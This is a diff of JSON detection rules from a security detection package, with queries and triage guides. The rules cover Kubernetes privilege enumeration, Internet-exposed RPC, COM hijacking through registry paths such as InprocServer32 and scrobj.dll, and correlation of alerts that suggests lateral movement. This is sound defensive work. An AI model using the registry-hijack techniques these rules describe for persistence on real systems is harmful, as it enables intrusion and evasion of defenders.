The detection rule identifies unusual API calls by non-human identities, flagging potential unauthorized privilege enumeration attempts.\n\n### Possible investigation steps\n\n- Review the Kubernetes audit logs to identify the specific service account or node that triggered the alert by examining the kubernetes.audit.user.username or kubernetes.audit.impersonatedUser.username fields.\n- Check the context of the API call by analyzing the kubernetes.audit.objectRef.resource field to confirm whether it involved selfsubjectaccessreviews or selfsubjectrulesreviews.\n- Investigate the source of the API request by looking at the IP address and user agent in the audit logs to determine if the request originated from a known or expected source.\n- Assess the recent activity of the implicated service account or node to identify any unusual patterns or deviations from normal behavior.\n- Verify if there have been any recent changes to the permissions or roles associated with the service account or node to understand if the access level has been altered.\n- Cross-reference the alert with any other security events or alerts in the environment to determine if this is part of a broader attack or compromise.\n\n### False positive analysis\n\n- Service accounts used for automated tasks may trigger this rule if they are programmed to check permissions as part of their routine operations. To handle this, identify these accounts and create exceptions for their specific API calls.\n- Nodes performing legitimate self-assessment for compliance or security checks might be flagged. Review the node's purpose and, if necessary, whitelist these actions in the detection rule.\n- Development or testing environments where permissions are frequently checked by service accounts can generate false positives. 
Consider excluding these environments from the rule or adjusting the rule's sensitivity for these specific contexts.\n- Regularly scheduled jobs or scripts that include permission checks as part of their execution may cause alerts. Document these jobs and adjust the rule to ignore these specific, non-threatening behaviors.\n\n### Response and remediation\n\n- Immediately isolate the compromised service account or node by revoking its access tokens and credentials to prevent further unauthorized actions within the cluster.\n- Conduct a thorough review of the audit logs to identify any other suspicious activities or access patterns associated with the compromised identity, focusing on any lateral movement or privilege escalation attempts.\n- Rotate credentials and tokens for all service accounts and nodes that may have been exposed or compromised, ensuring that new credentials are distributed securely.\n- Implement network segmentation and access controls to limit the ability of compromised identities to interact with sensitive resources or other parts of the cluster.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been affected.\n- Enhance monitoring and alerting for similar suspicious activities by tuning detection systems to recognize patterns of unauthorized privilege enumeration attempts.\n- Review and update Kubernetes role-based access control (RBAC) policies to ensure that service accounts and nodes have the minimum necessary permissions, reducing the risk of privilege abuse.", - "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb:\"create\"\n and kubernetes.audit.objectRef.resource:(\"selfsubjectaccessreviews\" or \"selfsubjectrulesreviews\")\n and (kubernetes.audit.user.username:(system\\:serviceaccount\\:* or system\\:node\\:*)\n or 
kubernetes.audit.impersonatedUser.username:(system\\:serviceaccount\\:* or system\\:node\\:*))\n", - "references": [ - "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms", - "https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access", - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/detecting-identity-attacks-in-kubernetes/ba-p/3232340" - ], - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.impersonatedUser.username", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.objectRef.resource", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.user.username", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.verb", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "12a2f15d-597e-4334-88ff-38a02cb1330b", - "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Discovery", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1613", - "name": "Container and Resource Discovery", - "reference": "https://attack.mitre.org/techniques/T1613/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 206 - }, - "id": 
"12a2f15d-597e-4334-88ff-38a02cb1330b_206", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_105.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_105.json deleted file mode 100644 index bfc42b12b15..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_105.json +++ /dev/null 
@@ -1,98 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector.", - "from": "now-9m", - "index": [ - "packetbeat-*", - "auditbeat-*", - "filebeat-*", - "logs-network_traffic.*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "RPC (Remote Procedure Call) from the Internet", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating RPC (Remote Procedure Call) from the Internet\n\nRPC enables remote management and resource sharing, crucial for system administration. However, when exposed to the Internet, it becomes a target for attackers seeking initial access or backdoor entry. 
The detection rule identifies suspicious RPC traffic by monitoring TCP port 135 and filtering out internal IP addresses, flagging potential threats from external sources.\n\n### Possible investigation steps\n\n- Review the source IP address of the alert to determine if it is from a known malicious actor or if it has been flagged in previous incidents.\n- Check the destination IP address to confirm it belongs to a critical internal system that should not be exposed to the Internet.\n- Analyze network traffic logs to identify any unusual patterns or volumes of traffic associated with the source IP, focusing on TCP port 135.\n- Investigate any related alerts or logs from the same source IP or destination IP to identify potential patterns or repeated attempts.\n- Assess the potential impact on the affected system by determining if any unauthorized access or changes have occurred.\n- Consult threat intelligence sources to gather additional context on the source IP or any related indicators of compromise.\n\n### False positive analysis\n\n- Internal testing or development environments may generate RPC traffic that appears to originate from external sources. To manage this, add the IP addresses of these environments to the exception list in the detection rule.\n- Legitimate remote management activities by trusted third-party vendors could trigger the rule. Verify the IP addresses of these vendors and include them in the exception list if they are known and authorized.\n- Misconfigured network devices or proxies might route internal RPC traffic through external IP addresses. Review network configurations to ensure proper routing and add any necessary exceptions for known devices.\n- Cloud-based services or applications that use RPC for legitimate purposes might be flagged. 
Identify these services and adjust the rule to exclude their IP ranges if they are verified as non-threatening.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the attacker.\n- Conduct a thorough examination of the system logs and network traffic to identify any unauthorized access or data exfiltration attempts.\n- Apply the latest security patches and updates to the affected system to address any vulnerabilities that may have been exploited.\n- Change all administrative and user credentials on the affected system and any other systems that may have been accessed using the same credentials.\n- Implement network segmentation to limit the exposure of critical systems and services, ensuring that RPC services are not accessible from the Internet.\n- Monitor the network for any signs of re-infection or further suspicious activity, focusing on traffic patterns similar to those identified in the initial alert.\n- Escalate the incident to the security operations center (SOC) or relevant cybersecurity team for further investigation and to determine if additional systems are compromised.", - "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and (destination.port:135 or event.dataset:zeek.dce_rpc) and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", - "references": 
[ - "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" - ], - "related_integrations": [ - { - "package": "network_traffic", - "version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "network.transport", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 73, - "rule_id": "143cb236-0956-4f42-a706-814bcaa0cf5a", - "severity": "high", - "tags": [ - "Tactic: Initial Access", - "Domain: Endpoint", - "Use Case: Threat Detection", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1190", - "name": "Exploit Public-Facing Application", - "reference": "https://attack.mitre.org/techniques/T1190/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "143cb236-0956-4f42-a706-814bcaa0cf5a_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_119.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_119.json new file mode 100644 index 00000000000..256687cbb19 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_119.json 
@@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Component Object Model Hijacking", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft 
executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\" and process.executable != null and \n (\n (\n registry.path : \"HK*\\\\InprocServer32\\\\\" and\n registry.data.strings: (\"scrobj.dll\", \"?:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\"\n ) or\n\n (\n registry.path : \"HKLM\\\\*\\\\InProcServer32\\\\*\" and\n registry.data.strings : (\"*\\\\Users\\\\*\", \"*\\\\ProgramData\\\\*\")\n ) or\n\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (\n registry.path : (\n \"HKEY_USERS\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\DelegateExecute\",\n \"HKEY_USERS\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*\\\\ScriptletURL*\", \n \"HKEY_USERS\\\\*\\\\TypeLib*\\\\Win*\"\n ) and\n not registry.data.strings : (\n /* COM related to Windows Spotlight feature */\n \"{4813071a-41ad-44a2-9835-886d2f63ca30}\",\n\n /* AppX/MSIX DelegateExecute handlers: execute, protocol, file */\n \"{A56A841F-E974-45C1-8001-7E3F8A085917}\",\n \"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}\",\n \"{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}\"\n )\n )\n ) and \n \n not (\n process.code_signature.trusted == true and\n process.code_signature.subject_name in (\n \"Island Technology Inc.\", \"Google LLC\", \"Grammarly, Inc.\", \"Dropbox, Inc\", \"REFINITIV US LLC\", \"HP Inc.\", \"Adobe Inc.\",\n \"Citrix Systems, Inc.\", \"Veeam Software Group GmbH\", \"Zhuhai 
Kingsoft Office Software Co., Ltd.\", \"Oracle America, Inc.\",\n \"Brave Software, Inc.\", \"DeepL SE\", \"Opera Norway AS\", \"Thomas Braun\", \"Slack Technologies, LLC\", \"Spotify AB\",\n \"Vivaldi Technologies AS\"\n )\n ) and \n\n /* excludes Microsoft signed noisy processes */\n not\n (\n process.name : (\n \"OneDrive.exe\", \"OneDriveSetup.exe\", \"FileSyncConfig.exe\", \"Teams.exe\", \"MicrosoftEdgeUpdate.exe\", \"msrdcw.exe\",\n \"MicrosoftEdgeUpdateComRegisterShell64.exe\", \"setup.exe\", \"PowerToys.PowerLauncher.exe\"\n ) and\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\")\n ) and\n \n not process.executable : (\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\ProgramData\\\\4Team\\\\4Team-Updater\\\\4Team-Updater-Helper.exe\",\n \"?:\\\\ProgramData\\\\Lenovo\\\\Udc\\\\Hosts\\\\x64\\\\MessagingPlugin.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Wondershare\\\\Wondershare NativePush\\\\WsToastNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\FMToastNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\regsvr32.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\",\n \"\\\\Device\\\\Mup\\\\*\\\\Kufer\\\\KuferSQL\\\\BasysSQL.exe\"\n )\n", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": 
"https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 119 + }, + "id": "16a52c14-7883-47af-8745-9357803f0d4c_119", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/171a4981-9c1a-4a03-9028-21cff4b27b38_1.json b/packages/security_detection_engine/kibana/security_rule/171a4981-9c1a-4a03-9028-21cff4b27b38_1.json deleted file mode 100644 index 1bbb7246456..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/171a4981-9c1a-4a03-9028-21cff4b27b38_1.json +++ /dev/null 
@@ -1,115 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects potential lateral movement or post-compromise activity by correlating alerts where the host.ip of one alert matches the source.ip of a subsequent alert. This behavior may indicate a compromised host being used to authenticate to another system or resource, including cloud services.", - "from": "now-30m", - "interval": "29m", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspected Lateral Movement from Compromised Host", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspected Lateral Movement from Compromised Host\n\nThe detection rule uses alert data to determine when multiple alerts from different integrations involving the same user.name are triggered.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific host involved and the different modules and rules that triggered the alert.\n- Examine the timeline of the alerts to understand the sequence of events and determine if there is a pattern or progression in the tactics used.\n- Correlate the alert data with other logs and telemetry from the host, such as process creation, network connections, and file modifications, to gather additional context.\n- Investigate any known vulnerabilities or misconfigurations on the host that could have been exploited by the adversary.\n- Check for any indicators of compromise (IOCs) associated with the alerts, such as suspicious IP addresses, domains, or file hashes, and search for these across the network.\n- Assess the impact and scope of the potential compromise by determining if other hosts or systems have 
similar alerts or related activity.\n\n### False positive analysis\n\n- Vulnerability scanners.\n- Jump hosts, NAT gateways and proxies.\n\n### Response and remediation\n\n- Isolate the affected host from the network immediately to prevent further lateral movement by the adversary.\n- Conduct a thorough forensic analysis of the host to identify the specific vulnerabilities exploited and gather evidence of the attack phases involved.\n- Remove any identified malicious software or unauthorized access tools from the host, ensuring all persistence mechanisms are eradicated.\n- Apply security patches and updates to the host to address any exploited vulnerabilities and prevent similar attacks.\n- Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise.\n- Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns.\n- Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.", - "query": "from .alerts-security.*\n\n// any alerts excluding deprecated, low severity and threat_match rules\n| where kibana.alert.rule.name is not null and kibana.alert.risk_score > 21 and\n kibana.alert.rule.type != \"threat_match\" and\n not kibana.alert.rule.name like \"Deprecated - *\"\n\n// alerts with existing source.ip or host.ip\n| eval alert_source_ip = CASE(source.ip is not null, source.ip, null),\n alert_host_ip = CASE(host.ip is not null and source.ip is null, host.ip, null)\n\n| eval Esql.source_ip = COALESCE(alert_source_ip, alert_host_ip)\n| where Esql.source_ip is not null and Esql.source_ip != \"127.0.0.1\" and Esql.source_ip != \"::1\"\n\n| stats Esql.alerts_count = COUNT(*),\n Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),\n Esql.host_id_distinct_count = COUNT_DISTINCT(host.id),\n 
Esql.rule_name_distinct_count = COUNT_DISTINCT(kibana.alert.rule.name),\n Esql.event_module_values = VALUES(event.module),\n Esql.message_values = VALUES(message),\n Esql.rule_name = VALUES(kibana.alert.rule.name),\n Esql.event_action_values = VALUES(event.action),\n Esql.event_category_values = VALUES(event.category),\n Esql.process_executable_values = VALUES(process.executable),\n Esql.process_cmdline_values = VALUES(process.command_line),\n Esql.file_path_values = VALUES(file.path),\n Esql.host_id_values = VALUES(host.id),\n Esql.host_ip_values = VALUES(host.ip),\n Esql.destination_ip_values = VALUES(destination.ip),\n Esql.user_name_values = VALUES(user.name),\n SRC_IP = VALUES(source.ip)\n by Esql.source_ip\n\n// filter for different alerts from multiple hosts and where the host.ip of one alert matches the source.ip of the other alert\n| eval concat_ip_values = MV_CONCAT(TO_STRING(Esql.host_ip_values), \",\")\n| eval host_ip_equal_to_source_ip =LOCATE(concat_ip_values, TO_STRING(Esql.source_ip))\n| where Esql.rule_name_distinct_count >= 2 and Esql.host_id_distinct_count >= 2 and host_ip_equal_to_source_ip > 0 and SRC_IP is not null and Esql.alerts_count <= 100\n| KEEP Esql.*\n", - "required_fields": [ - { - "ecs": false, - "name": "Esql.alerts_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.destination_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.event_action_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_category_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_module_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.event_module_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.host_id_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.host_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": 
"Esql.host_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.message_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_cmdline_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_executable_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.rule_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.rule_name_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.source_ip", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.user_name_values", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "171a4981-9c1a-4a03-9028-21cff4b27b38", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "171a4981-9c1a-4a03-9028-21cff4b27b38_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1.json b/packages/security_detection_engine/kibana/security_rule/1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1.json deleted file mode 100644 index 6d769918c58..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1.json +++ /dev/null 
@@ -1,118 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects Elastic SIEM high severity detection alerts that are observed for the first time in the previous 5 days of alert history. It highlights low-volume, newly observed alerts tied to a specific detection rule, analysts can use this to prioritize triage and response.", - "from": "now-7205m", - "interval": "5m", - "language": "esql", - "license": "Elastic License v2", - "name": "Newly Observed High Severity Detection Alert", - "note": "## Triage and analysis\n\n### Investigating Newly Observed High Severity Detection Alert\n\nThis rule surfaces newly observed, low-frequency behavior high severity alerts affecting a single agent within the current day.\n\nBecause the alert has not been seen previously for this rule and host, it should be prioritized for validation to determine\nwhether it represents a true compromise or rare benign activity.\n\n### Investigation Steps\n\n- Identify the affected host, user and review the associated rule name to understand the behavior that triggered the alert.\n- Validate the user context under which the activity occurred and assess whether it aligns with normal behavior for that account.\n- Refer to the specific rule investiguation guide for further actions.\n\n### False Positive Considerations\n\n- Newly deployed or updated software may introduce behavior not previously observed on the host.\n- Administrative scripts or automation tools can trigger behavior-based detections when first introduced.\n- Security tooling, IT management agents, or EDR integrations may generate new behavior alerts during updates or configuration changes.\n- Development or testing environments may produce one-off behaviors that resemble malicious techniques.\n\n### Response and Remediation\n\n- If the activity is confirmed malicious, isolate the affected host to prevent further execution or lateral movement.\n- Terminate malicious processes and remove any 
dropped files or persistence mechanisms.\n- Collect forensic artifacts to understand initial access and execution flow.\n- Patch or remediate any vulnerabilities or misconfigurations that enabled the behavior.\n- If benign, document the finding and consider tuning or exception handling to reduce future noise.\n- Continue monitoring the host and environment for recurrence of the behavior or related alerts.", - "query": "FROM .alerts-security.*\n| where kibana.alert.rule.name is not null and kibana.alert.risk_score >= 73 and\n not kibana.alert.rule.type in (\"threat_match\", \"machine_learning\", \"new_terms\") and\n not kibana.alert.rule.name like \"Deprecated - *\" and kibana.alert.rule.name != \"My First Rule\" and\n // covered by 7306ce7d-5c90-4f42-aa6c-12b0dc2fe3b8\n event.dataset != \"endpoint.alerts\"\n| STATS Esql.alerts_count = count(*),\n Esql.first_time_seen = MIN(@timestamp),\n Esql.last_time_seen = MAX(@timestamp),\n Esql.process_executable = VALUES(process.executable),\n Esql.cmd_line = VALUES(process.command_line),\n Esql.parent_executable = VALUES(process.parent.executable),\n Esql.file_path_values = VALUES(file.path),\n Esql.file_path_values = VALUES(file.path),\n Esql.dll_path_values = VALUES(dll.path),\n Esql.user_id_values = VALUES(user.id),\n Esql.user_name_values = VALUES(user.name),\n Esql.agent_id_values = VALUES(agent.id),\n Esql.host_id_values = VALUES(host.id),\n Esql.event_module_values = VALUES(event.module),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.agents_distinct_count = COUNT_DISTINCT(agent.id) by kibana.alert.rule.name\n// fist time seen in the last 5 days - defined in the rule schedule Additional look-back time\n| eval Esql.recent = DATE_DIFF(\"minute\", Esql.first_time_seen, now())\n// first time seen is within 10m of the rule execution time\n| where Esql.recent <= 10 and Esql.agents_distinct_count == 1 and Esql.alerts_count <= 10 and (Esql.last_time_seen == Esql.first_time_seen)\n| keep kibana.alert.rule.name, Esql.*\n", 
- "references": [ - "https://www.elastic.co/docs/solutions/security/detect-and-alert/about-detection-rules" - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.agent_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.agents_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.alerts_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.cmd_line", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.dll_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_module_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.first_time_seen", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.host_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.last_time_seen", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.parent_executable", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_executable", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.recent", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.source_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.user_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.user_name_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "kibana.alert.rule.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "1a3d5b36-b995-4ace-9b85-8a0af429ccf6", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - 